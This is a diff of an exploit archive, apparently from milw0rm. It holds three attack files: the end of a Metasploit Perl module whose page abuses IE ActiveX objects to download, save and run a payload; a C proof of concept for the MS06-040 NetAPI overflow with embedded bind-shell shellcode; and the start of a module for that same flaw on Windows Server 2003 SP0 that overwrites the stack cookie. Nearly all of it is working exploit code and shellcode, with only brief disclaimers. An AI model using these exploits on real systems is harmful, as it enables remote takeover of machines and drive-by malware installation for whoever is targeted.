+	while (defined($client = $server->accept())) {
+		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
+	}
+
+	return;
+}
+
+sub HandleHttpClient
+{
+	my $self      = shift;
+	my $fd        = shift;
+	my $shellcode = my $shellcode = $self->GetVar('EncodedPayload')->Payload;
+	 
+	# Set the remote host information
+	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
+
+	# Read the HTTP command
+	my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);
+
+	# Read the HTTP headers
+	my $headers;
+	while ( (my $line = $fd->RecvLine(10))) {
+		$headers .= $line;
+		last if $line eq "\r\n";
+	}
+
+	if ($url =~ /\?payload/) {
+		$self->PrintLine("[*] HTTP Client $rhost:$rport asked for payload...");
+		my $content = Pex::Utils::CreateWin32PE($shellcode, 'ie_createobject');
+		$fd->Send($self->BuildResponse($content, 'application/octet-stream'));
+		$fd->Close;
+		return;
+	}
+	$self->PrintLine("[*] HTTP Client $rhost:$rport asked for exploit page...");
+	$fd->Send($self->BuildResponse($self->GenerateHTML(), 'text/html'));
+	$fd->Close;
+	return;
+}
+
+sub GenerateHTML {
+	my $self       = shift;
+	my $target_idx = $self->GetVar('TARGET');
+	my $objects    = "";
+	
+	if ($target_idx == 0) {
+		foreach my $target (@{ $self->Targets }) {
+			if ($target->[1]) {
+				$objects .= "'".$target->[1]."',";
+			}
+		}
+	} else {
+		my $target = $self->Targets->[$target_idx];
+		$objects .= "'".$target->[1]."',";
+	}
+
+	my $data  = 
+qq#
+<html><head><title></title>
+<script language="javascript">
+
+function Log(m) {
+	var log = document.createElement('p');
+	log.innerHTML = m;
+	document.body.appendChild(log);
+	
+}
+
+function CreateO(o, n) {
+	var r = null;
+	
+	try { eval('r = o.CreateObject(n)') }catch(e){}
+	
+	if (! r) {
+		try { eval('r = o.CreateObject(n, "")') }catch(e){}
+	}
+	
+	if (! r) {
+		try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
+	}
+
+	if (! r) {
+		try { eval('r = o.GetObject("", n)') }catch(e){}
+	}
+	
+	if (! r) {
+		try { eval('r = o.GetObject(n, "")') }catch(e){}
+	}
+	
+	if (! r) {
+		try { eval('r = o.GetObject(n)') }catch(e){}
+	}
+	
+	return(r);	
+}
+
+function Go(a) {
+	Log('Creating helper objects...');
+	var s = CreateO(a, "WScript.Shell");
+	var o = CreateO(a, "ADODB.Stream");
+	var e = s.Environment("Process");
+	
+	Log('Ceating the XMLHTTP object...');
+	var url = document.location + '?payload';
+	var xml = null;
+	var bin = e.Item("TEMP") + "metasploit.exe";
+	var dat; 
+	
+	try { xml=new XMLHttpRequest(); }
+	catch(e) {
+		try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
+		catch(e) {
+			xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
+		}
+	}
+	
+	if (! xml) return(0);
+
+	Log('Downloading the payload...');	
+	xml.open("GET", url, false)
+	xml.send(null);
+	dat = xml.responseBody;
+
+	Log('Writing the payload to disk...');	
+	o.Type = 1;
+	o.Mode = 3;
+	o.Open();
+	o.Write(dat);
+	o.SaveToFile(bin, 2);
+
+	Log('Executing the payload...');		
+	s.Run(bin,0);
+}
+
+function Exploit() {
+	var i = 0;
+	var t = new Array(${objects}null);
+	
+	while (t[i]) {
+		var a = null;
+		
+		if (t[i].substring(0,1) == '{') {
+			a = document.createElement("object");
+			a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
+		} else {
+			try { a = new ActiveXObject(t[i]); } catch(e){}
+		}
+		
+		if (a) {
+			try {		
+				var b = CreateO(a, "WScript.Shell");
+				if (b) {
+					Log('Loaded ' + t[i]);
+					Go(a);
+					return(0);
+				}
+			} catch(e){}
+		}
+		i++;
+	}
+	Log('Exploit failed.');
+}
+</script>
+</head>
+<body onload='Exploit()'>
+<p>Initializing...</p>
+</body>
+</html>
+#;
+}
+
+sub BuildResponse {
+	my ($self, $content, $type) = @_;
+	$type ||= 'text/plain';
+
+	my $response =
+	  "HTTP/1.1 200 OK\r\n" .
+	  "Content-Type: $type\r\n";
+
+	if ($self->GetVar('Gzip')) {
+		$response .= "Content-Encoding: gzip\r\n";
+		$content = $self->Gzip($content);
+	}
+	if ($self->GetVar('Chunked')) {
+		$response .= "Transfer-Encoding: chunked\r\n";
+		$content = $self->Chunk($content);
+	} else {
+		$response .= 'Content-Length: ' . length($content) . "\r\n" .
+		  "Connection: close\r\n";
+	}
+
+	$response .= "\r\n" . $content;
+
+	return $response;
+}
+
+sub Chunk {
+	my ($self, $content) = @_;
+
+	my $chunked;
+	while (length($content)) {
+		my $chunk = substr($content, 0, int(rand(10) + 1), '');
+		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
+	}
+	$chunked .= "0\r\n\r\n";
+
+	return $chunked;
+}
+
+sub Gzip {
+	my $self = shift;
+	my $data = shift;
+	my $comp = int(rand(5))+5;
+
+	my($wtr, $rdr, $err);
+
+	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
+	print $wtr $data;
+	close ($wtr);
+	local $/;
+
+	return (<$rdr>);
+}
+
+1;
+
+# milw0rm.com [2006-08-10]

platforms/windows/remote/2265.c

@@ -1,180 +1,180 @@
-/*
- * MS06-040 Remote Code Execution Proof of Concept
- *
- * Ported by ub3r st4r aka iRP
- * ---------------------------------------------------------------------
- * Tested Against:
- *  Windows XP SP1
- *  Windows 2000 SP4
- *
- * Systems Affected:
- *  Microsoft Windows 2000 SP0-SP4
- *  Microsoft Windows XP SP0-SP1
- *  Microsoft Windows NT 4.0
- * ---------------------------------------------------------------------
- * This is provided as proof-of-concept code only for educational
- * purposes and testing by authorized individuals with permission
- * to do so.
- *
- * PRIVATE v.0.2 (08-27-06)
- */
-
-#include <stdio.h>
-#include <windows.h>
-
-#pragma comment(lib, "mpr")
-#pragma comment(lib, "Rpcrt4")
-
-// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
-unsigned char DCERPC_Bind_RPC_Service[] =
-       "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00"
-       "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
-       "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88"
-       "\x03\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
-       "\x2B\x10\x48\x60\x02\x00\x00\x00";
-
-// request windows api: NetprPathCanonicalize (0x1f)
-unsigned char DCERPC_Request_RPC_Service[] =
-       "\x05\x00\x00\x03\x10\x00\x00\x00\x30\x08\x00\x00\x00\x00\x00\x00"
-       "\x18\x08\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00"
-       "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00";
-
-       // path ...
-
-unsigned char DCERPC_Request_RPC_Service_[] =
-       "\xfa\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
-       "\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00";
-
-unsigned char sc[] =
-       "\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8\x97\x90"
-       "\x88\x83\xeb\xfc\xe2\xf4\x29\x53\x6f\x67\x57\x68\xd4\x74\xc2\x7c"
-       "\xdd\x60\x51\x68\x6f\x77\xc8\x1c\xfc\xac\x8c\x1c\xd5\xb4\x23\xeb"
-       "\x95\xf0\xa9\x78\x1b\xc7\xb0\x1c\xcf\xa8\xa9\x7c\xd9\x03\x9c\x1c"
-       "\x91\x66\x99\x57\x09\x24\x2c\x57\xe4\x8f\x69\x5d\x9d\x89\x6a\x7c"
-       "\x64\xb3\xfc\xb3\xb8\xfd\x4d\x1c\xcf\xac\xa9\x7c\xf6\x03\xa4\xdc"
-       "\x1b\xd7\xb4\x96\x7b\x8b\x84\x1c\x19\xe4\x8c\x8b\xf1\x4b\x99\x4c"
-       "\xf4\x03\xeb\xa7\x1b\xc8\xa4\x1c\xe0\x94\x05\x1c\xd0\x80\xf6\xff"
-       "\x1e\xc6\xa6\x7b\xc0\x77\x7e\xf1\xc3\xee\xc0\xa4\xa2\xe0\xdf\xe4"
-       "\xa2\xd7\xfc\x68\x40\xe0\x63\x7a\x6c\xb3\xf8\x68\x46\xd7\x21\x72"
-       "\xf6\x09\x45\x9f\x92\xdd\xc2\x95\x6f\x58\xc0\x4e\x99\x7d\x05\xc0"
-       "\x6f\x5e\xfb\xc4\xc3\xdb\xfb\xd4\xc3\xcb\xfb\x68\x40\xee\xc0\x86"
-       "\xcc\xee\xfb\x1e\x71\x1d\xc0\x33\x8a\xf8\x6f\xc0\x6f\x5e\xc2\x87"
-       "\xc1\xdd\x57\x47\xf8\x2c\x05\xb9\x79\xdf\x57\x41\xc3\xdd\x57\x47"
-       "\xf8\x6d\xe1\x11\xd9\xdf\x57\x41\xc0\xdc\xfc\xc2\x6f\x58\x3b\xff"
-       "\x77\xf1\x6e\xee\xc7\x77\x7e\xc2\x6f\x58\xce\xfd\xf4\xee\xc0\xf4"
-       "\xfd\x01\x4d\xfd\xc0\xd1\x81\x5b\x19\x6f\xc2\xd3\x19\x6a\x99\x57"
-       "\x63\x22\x56\xd5\xbd\x76\xea\xbb\x03\x05\xd2\xaf\x3b\x23\x03\xff"
-       "\xe2\x76\x1b\x81\x6f\xfd\xec\x68\x46\xd3\xff\xc5\xc1\xd9\xf9\xfd"
-       "\x91\xd9\xf9\xc2\xc1\x77\x78\xff\x3d\x51\xad\x59\xc3\x77\x7e\xfd"
-       "\x6f\x77\x9f\x68\x40\x03\xff\x6b\x13\x4c\xcc\x68\x46\xda\x57\x47"
-       "\xf8\x67\x66\x77\xf0\xdb\x57\x41\x6f\x58";
-
-int main(int argc, char* argv[])
-{
-       HANDLE hFile;
-       NETRESOURCE nr;
-
-       char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];
-
-       unsigned int i;
-
-       unsigned char szInBuf[4096];
-       unsigned long dwRead, nWritten;
-
-       unsigned char szReqBuf[2096];
-
-       if (argc < 3){
-               printf("[-] Usage: ms06040poc <host> [target]\n");
-               printf("\t1 - Windows 2000 SP0-SP4\n");
-               printf("\t2 - Windows XP SP0-SP1\n");
-               return -1;
-       }
-
-       memset(szReqBuf, 0, sizeof(szReqBuf));
-
-       if (atoi(argv[2]) == 1) {
-               unsigned char szBuff[1064];
-
-               // build payload buffer
-               memset(szBuff, '\x90', 1000);
-               memcpy(szBuff+630, sc, sizeof(sc));
-
-               for(i=1000; i<1064; i+=4) {
-                       memcpy(szBuff+i, "\x04\x08\x02\x00", 4);
-               }
-
-               // build request buffer
-               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
-               memcpy(szReqBuf+44, "\x15\x02\x00\x00", 4); /* max count */
-               memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */
-               memcpy(szReqBuf+52, "\x15\x02\x00\x00", 4); /* actual count */
-               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
-               memcpy(szReqBuf+1120, "\x00\x00\x00\x00", 4); /* align string */
-               memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
-               memcpy(szReqBuf+1140 , "\xeb\x02", 2);
-       }
-       if (atoi(argv[2]) == 2) {
-               unsigned char szBuff[708];
-
-               memset(szBuff, '\x90', 612); /* size of shellcode */
-               memcpy(szBuff, sc, sizeof(sc));
-
-               memcpy(szBuff+612, "\x0a\x08\x02\x00", 4);
-               memset(szBuff+616, 'A', 8); // 8 bytes padding
-               memcpy(szBuff+624, "\x04\x08\x02\x00", 4);
-               memset(szBuff+628, '\x90', 32);
-               memcpy(szBuff+660, "\x04\x08\x02\x00", 4);
-               memset(szBuff+664, 'B', 8); // 8 bytes padding
-               memcpy(szBuff+672, "\x04\x08\x02\x00", 4);
-               memset(szBuff+676, '\x90', 32);
-
-               // build request buffer
-               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
-               memcpy(szReqBuf+44, "\x63\x01\x00\x00", 4); /* max count */
-               memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */
-               memcpy(szReqBuf+52, "\x63\x01\x00\x00", 4); /* actual count */
-               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
-               memcpy(szReqBuf+764, "\x00\x00\x00\x00", 4); /* align string */
-               memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
-       }
-
-       printf("[+] Connecting to %s ... \n", argv[1]);
-
-       _snprintf(szRemoteName, sizeof(szRemoteName), "\\\\%s\\ipc$", argv[1]);
-       nr.dwType = RESOURCETYPE_ANY;
-       nr.lpLocalName = NULL;
-       nr.lpProvider = NULL;
-       nr.lpRemoteName = szRemoteName;
-       if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) {
-               printf("[-] Failed to connect to host !\n");
-               return -1;
-       }
-
-       _snprintf(szPipePath, sizeof(szPipePath), "\\\\%s\\pipe\\browser", argv[1]);
-       hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
-
-       if (hFile == INVALID_HANDLE_VALUE) {
-               printf("[-] Failed to open named pipe !\n");
-               return -1;
-       }
-
-       printf("[+] Binding to RPC interface ... \n");
-       if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {
-               printf("[-] Failed to bind to interface !\n");
-               CloseHandle(hFile);
-               return -1;
-       }
-
-       printf("[+] Sending RPC request ... \n");
-       if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
-               printf("[-] Unable to transmit RPC request !\n");
-               CloseHandle(hFile);
-               return -1;
-       }
-
-       printf("[+] Now check for shell on %s:4444 !\n", argv[1]);
-
-       return 0;
-}
-
-// milw0rm.com [2006-08-28]
+/*
+ * MS06-040 Remote Code Execution Proof of Concept
+ *
+ * Ported by ub3r st4r aka iRP
+ * ---------------------------------------------------------------------
+ * Tested Against:
+ *  Windows XP SP1
+ *  Windows 2000 SP4
+ *
+ * Systems Affected:
+ *  Microsoft Windows 2000 SP0-SP4
+ *  Microsoft Windows XP SP0-SP1
+ *  Microsoft Windows NT 4.0
+ * ---------------------------------------------------------------------
+ * This is provided as proof-of-concept code only for educational
+ * purposes and testing by authorized individuals with permission
+ * to do so.
+ *
+ * PRIVATE v.0.2 (08-27-06)
+ */
+
+#include <stdio.h>
+#include <windows.h>
+
+#pragma comment(lib, "mpr")
+#pragma comment(lib, "Rpcrt4")
+
+// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
+unsigned char DCERPC_Bind_RPC_Service[] =
+       "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00"
+       "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
+       "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88"
+       "\x03\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
+       "\x2B\x10\x48\x60\x02\x00\x00\x00";
+
+// request windows api: NetprPathCanonicalize (0x1f)
+unsigned char DCERPC_Request_RPC_Service[] =
+       "\x05\x00\x00\x03\x10\x00\x00\x00\x30\x08\x00\x00\x00\x00\x00\x00"
+       "\x18\x08\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00"
+       "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00";
+
+       // path ...
+
+unsigned char DCERPC_Request_RPC_Service_[] =
+       "\xfa\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
+       "\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00";
+
+unsigned char sc[] =
+       "\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8\x97\x90"
+       "\x88\x83\xeb\xfc\xe2\xf4\x29\x53\x6f\x67\x57\x68\xd4\x74\xc2\x7c"
+       "\xdd\x60\x51\x68\x6f\x77\xc8\x1c\xfc\xac\x8c\x1c\xd5\xb4\x23\xeb"
+       "\x95\xf0\xa9\x78\x1b\xc7\xb0\x1c\xcf\xa8\xa9\x7c\xd9\x03\x9c\x1c"
+       "\x91\x66\x99\x57\x09\x24\x2c\x57\xe4\x8f\x69\x5d\x9d\x89\x6a\x7c"
+       "\x64\xb3\xfc\xb3\xb8\xfd\x4d\x1c\xcf\xac\xa9\x7c\xf6\x03\xa4\xdc"
+       "\x1b\xd7\xb4\x96\x7b\x8b\x84\x1c\x19\xe4\x8c\x8b\xf1\x4b\x99\x4c"
+       "\xf4\x03\xeb\xa7\x1b\xc8\xa4\x1c\xe0\x94\x05\x1c\xd0\x80\xf6\xff"
+       "\x1e\xc6\xa6\x7b\xc0\x77\x7e\xf1\xc3\xee\xc0\xa4\xa2\xe0\xdf\xe4"
+       "\xa2\xd7\xfc\x68\x40\xe0\x63\x7a\x6c\xb3\xf8\x68\x46\xd7\x21\x72"
+       "\xf6\x09\x45\x9f\x92\xdd\xc2\x95\x6f\x58\xc0\x4e\x99\x7d\x05\xc0"
+       "\x6f\x5e\xfb\xc4\xc3\xdb\xfb\xd4\xc3\xcb\xfb\x68\x40\xee\xc0\x86"
+       "\xcc\xee\xfb\x1e\x71\x1d\xc0\x33\x8a\xf8\x6f\xc0\x6f\x5e\xc2\x87"
+       "\xc1\xdd\x57\x47\xf8\x2c\x05\xb9\x79\xdf\x57\x41\xc3\xdd\x57\x47"
+       "\xf8\x6d\xe1\x11\xd9\xdf\x57\x41\xc0\xdc\xfc\xc2\x6f\x58\x3b\xff"
+       "\x77\xf1\x6e\xee\xc7\x77\x7e\xc2\x6f\x58\xce\xfd\xf4\xee\xc0\xf4"
+       "\xfd\x01\x4d\xfd\xc0\xd1\x81\x5b\x19\x6f\xc2\xd3\x19\x6a\x99\x57"
+       "\x63\x22\x56\xd5\xbd\x76\xea\xbb\x03\x05\xd2\xaf\x3b\x23\x03\xff"
+       "\xe2\x76\x1b\x81\x6f\xfd\xec\x68\x46\xd3\xff\xc5\xc1\xd9\xf9\xfd"
+       "\x91\xd9\xf9\xc2\xc1\x77\x78\xff\x3d\x51\xad\x59\xc3\x77\x7e\xfd"
+       "\x6f\x77\x9f\x68\x40\x03\xff\x6b\x13\x4c\xcc\x68\x46\xda\x57\x47"
+       "\xf8\x67\x66\x77\xf0\xdb\x57\x41\x6f\x58";
+
+int main(int argc, char* argv[])
+{
+       HANDLE hFile;
+       NETRESOURCE nr;
+
+       char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];
+
+       unsigned int i;
+
+       unsigned char szInBuf[4096];
+       unsigned long dwRead, nWritten;
+
+       unsigned char szReqBuf[2096];
+
+       if (argc < 3){
+               printf("[-] Usage: ms06040poc <host> [target]\n");
+               printf("\t1 - Windows 2000 SP0-SP4\n");
+               printf("\t2 - Windows XP SP0-SP1\n");
+               return -1;
+       }
+
+       memset(szReqBuf, 0, sizeof(szReqBuf));
+
+       if (atoi(argv[2]) == 1) {
+               unsigned char szBuff[1064];
+
+               // build payload buffer
+               memset(szBuff, '\x90', 1000);
+               memcpy(szBuff+630, sc, sizeof(sc));
+
+               for(i=1000; i<1064; i+=4) {
+                       memcpy(szBuff+i, "\x04\x08\x02\x00", 4);
+               }
+
+               // build request buffer
+               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
+               memcpy(szReqBuf+44, "\x15\x02\x00\x00", 4); /* max count */
+               memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */
+               memcpy(szReqBuf+52, "\x15\x02\x00\x00", 4); /* actual count */
+               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
+               memcpy(szReqBuf+1120, "\x00\x00\x00\x00", 4); /* align string */
+               memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
+               memcpy(szReqBuf+1140 , "\xeb\x02", 2);
+       }
+       if (atoi(argv[2]) == 2) {
+               unsigned char szBuff[708];
+
+               memset(szBuff, '\x90', 612); /* size of shellcode */
+               memcpy(szBuff, sc, sizeof(sc));
+
+               memcpy(szBuff+612, "\x0a\x08\x02\x00", 4);
+               memset(szBuff+616, 'A', 8); // 8 bytes padding
+               memcpy(szBuff+624, "\x04\x08\x02\x00", 4);
+               memset(szBuff+628, '\x90', 32);
+               memcpy(szBuff+660, "\x04\x08\x02\x00", 4);
+               memset(szBuff+664, 'B', 8); // 8 bytes padding
+               memcpy(szBuff+672, "\x04\x08\x02\x00", 4);
+               memset(szBuff+676, '\x90', 32);
+
+               // build request buffer
+               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
+               memcpy(szReqBuf+44, "\x63\x01\x00\x00", 4); /* max count */
+               memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */
+               memcpy(szReqBuf+52, "\x63\x01\x00\x00", 4); /* actual count */
+               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
+               memcpy(szReqBuf+764, "\x00\x00\x00\x00", 4); /* align string */
+               memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
+       }
+
+       printf("[+] Connecting to %s ... \n", argv[1]);
+
+       _snprintf(szRemoteName, sizeof(szRemoteName), "\\\\%s\\ipc$", argv[1]);
+       nr.dwType = RESOURCETYPE_ANY;
+       nr.lpLocalName = NULL;
+       nr.lpProvider = NULL;
+       nr.lpRemoteName = szRemoteName;
+       if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) {
+               printf("[-] Failed to connect to host !\n");
+               return -1;
+       }
+
+       _snprintf(szPipePath, sizeof(szPipePath), "\\\\%s\\pipe\\browser", argv[1]);
+       hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
+
+       if (hFile == INVALID_HANDLE_VALUE) {
+               printf("[-] Failed to open named pipe !\n");
+               return -1;
+       }
+
+       printf("[+] Binding to RPC interface ... \n");
+       if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {
+               printf("[-] Failed to bind to interface !\n");
+               CloseHandle(hFile);
+               return -1;
+       }
+
+       printf("[+] Sending RPC request ... \n");
+       if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
+               printf("[-] Unable to transmit RPC request !\n");
+               CloseHandle(hFile);
+               return -1;
+       }
+
+       printf("[+] Now check for shell on %s:4444 !\n", argv[1]);
+
+       return 0;
+}
+
+// milw0rm.com [2006-08-28]

platforms/windows/remote/2355.pm

@@ -1,233 +1,233 @@
-#########################################################################
-# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
-#
-# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
-#
-# http://sf-freedom.blogspot.com
-# 
-# For educational purpose only
-#
-# Note: This exploit is developed because of my question "Is it exploitable
-# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows
-# Server 2003 SP1 is not exploitable because they are compiled with /GS, but
-# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there
-# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not 
-# exploitable ? There is Stack Protection Windows Server 2003, is this the
-# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ?
-#
-# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him
-# ^-^) and work on it. The problem is the Stack Protection "security cookie 
-# checking". Because wcscpy() method allow me to write to any memory location
-# that are marked writable, I decide to write to the location at "security
-# cookie" is stored and it works !!! I will describe more implementation details
-# in my blog in few days ^-^ 
-#
-# This exploit tested on Windows Server 2003 SP0 build 3790 and successful 
-# exploit 2003 machine in my environment - all patch before MS06-040 
-# (KB921883). It's quite reliable but not 100%. There is the possibility that
-# the exploit will fail and the target system process crash. Because I have 
-# only one testbase system, I couldn't confirm this exploit will work on 
-# your environment. However feel free to e-mail to me.
-#
-# Credits: H D Moore
-#########################################################################
-
-package Msf::Exploit::netapi_win2003;
-use base "Msf::Exploit";
-use strict;
-
-use Pex::DCERPC;
-use Pex::NDR;
-
-my $advanced = {
-	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
-	'BindEvasion' => [ 0,   'IDS Evasion of the bind request' ],
-	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
-  };
-
-my $info = {
-	'Name'    => 'MSO6-040 Windows Server 2003 Target',
-	'Version' => '',
-	'Authors' =>
-	  [
-		'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',
-	  ],
-
-	'Arch' => ['x86'],
-	'OS'   => [ 'win32', 'win2003' ],
-	'Priv' => 1,
-
-	'AutoOpts' => { 'EXITFUNC' => 'thread' },
-	
-	'UserOpts' =>
-	  {
-		'RHOST' => [ 1, 'ADDR', 'The target address' ],
-
-		# SMB connection options
-		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
-		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
-		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
-	  },
-
-	'Payload' =>
-	  {
-	  	# Technically we can use more space than this, but by limiting it
-		# to 370 bytes we can use the same request for all Windows SPs.
-		'Space'    => 370,
-		
-		'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
-		'Keys'     => ['+ws2ord'],
-
-		# sub esp, 4097 + inc esp makes stack happy
-		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
-	  },
-
-	'Description' => Pex::Text::Freeform(
-		qq{
-		This exploit modified from netapi_ms06_040.pm (Metasploit).
-		While netapi_ms06_040 of metasploit works on Windows 2000 
-		SP0 - SP4 and Windows XP SP0 - SP1, this exploit works on
-		Windows Server 2003 SP0.
-	  }
-	  ),
-
-	'Refs' =>
-	  [
-		[ 'BID', '19409' ],
-		[ 'CVE', '2006-3439' ],
-		[ 'MSB', 'MS06-040' ],
-	  ],
-
-	'DefaultTarget' => 0,
-	'Targets'       =>
-	  [
-		[ '(wcscpy) Windows Server 2003 SP0', 612],
-	  ],
-
-	'Keys' => ['srvsvc'],
-
-	'DisclosureDate' => '',
-  };
-
-sub new {
-	my ($class) = @_;
-	my $self =
-	  $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
-	return ($self);
-}
-
-sub Exploit {
-	my ($self)      = @_;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $target_name = '*SMBSERVER';
-
-	my $FragSize = $self->GetVar('FragSize') || 256;
-	my $target   = $self->Targets->[$target_idx];
-
-	if (!$self->InitNops(128)) {
-		$self->PrintLine("Could not initialize the nop module");
-		return;
-	}
-
-	my ( $res, $rpc );
-
-	my $pipe    = '\BROWSER';
-	my $uuid    = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
-	my $version = '3.0';
-
-	my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );
-
-	my $dce = Pex::DCERPC->new(
-		'handle'      => $handle,
-		'username'    => $self->GetVar('SMBUSER'),
-		'password'    => $self->GetVar('SMBPASS'),
-		'domain'      => $self->GetVar('SMBDOM'),
-		'fragsize'    => $self->GetVar('FragSize'),
-		'bindevasion' => $self->GetVar('BindEvasion'),
-		'directsmb'   => $self->GetVar('DirectSMB'),
-	  );
-
-	if ( !$dce ) {
-		$self->PrintLine("[*] Could not bind to $handle");
-		return;
-	}
-
-	my $smb = $dce->{'_handles'}{$handle}{'connection'};
-	
-	if (! $smb) {
-		$self->PrintLine("[*] Could not establish SMB session");
-		return;
-	}
-
-	my $stub;
-
-	#
-	# Use the wcscpy() method on Windows Server 2003 SP0
-	#	
-	if ($target->[0] =~ /2003/) {
-
-		my $path = 	
-			$shellcode.
-
-			# Padding
-			Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
-			Pex::Text::AlphaNumText(32).
-			substr($shellcode, 0, 4).	# cookie
-			Pex::Text::AlphaNumText(4).
-			# return address == address that store security cookie
-			("\xec\xc1\xc8\x71") . 
-			Pex::Text::AlphaNumText(8).
-
-			("\xec\xc1\xc8\x71" x 2) .
-			Pex::Text::AlphaNumText(36).
-
-			# Terminate
-			"\x00\x00";
-
-
-		# Package that into a stub
-		$stub =
-			Pex::NDR::Long(int(rand(0xffffffff))).
-			Pex::NDR::UnicodeConformantVaryingString('').
-			Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
-			Pex::NDR::Long(int(rand(250)+1)).
-			Pex::NDR::UnicodeConformantVaryingString('').
-			Pex::NDR::Long(int(rand(250)+1)).
-			Pex::NDR::Long(0);
-	}
-	else {
-		$self->PrintLine("This target is not currently supported");
-		return;
-	}
-
-
-	$self->PrintLine("[*] Sending request...");
-	
-	# Function 0x1f is not the only way to exploit this :-)
-	my @response = $dce->request( $handle, 0x1f, $stub );
-	
